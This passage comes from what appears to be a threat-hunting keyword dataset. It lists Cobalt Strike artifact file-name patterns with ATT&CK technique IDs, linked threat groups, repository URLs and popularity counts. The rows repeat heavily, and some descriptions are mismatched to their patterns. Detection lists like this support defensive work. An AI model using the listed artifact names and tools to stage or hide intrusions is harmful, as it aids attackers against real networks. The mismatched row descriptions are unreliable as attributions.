T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*artifact_stageless*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact_stager*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Python API,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/dcsync/pycobalt,1,1,N/A,10,10,290,58,2022-01-27T07:31:36Z,2018-10-28T00:35:38Z -*artifact_stager*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact32*.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact32.dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact32.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact32.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact32.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact32big.dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact32big.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact32svc.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact32svcbig.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact64*.exe*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact64.dll*,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,1,N/A,10,10,N/A,N/A,N/A,N/A -*artifact64.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact64.x64.dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact64big.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact64big.x64.dll*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact64svc.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifact64svcbig.exe*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,1,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -*artifactbig64.exe*,offensive_tool_keyword,cobaltstrike,default articfact name generated by cobaltsrike Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 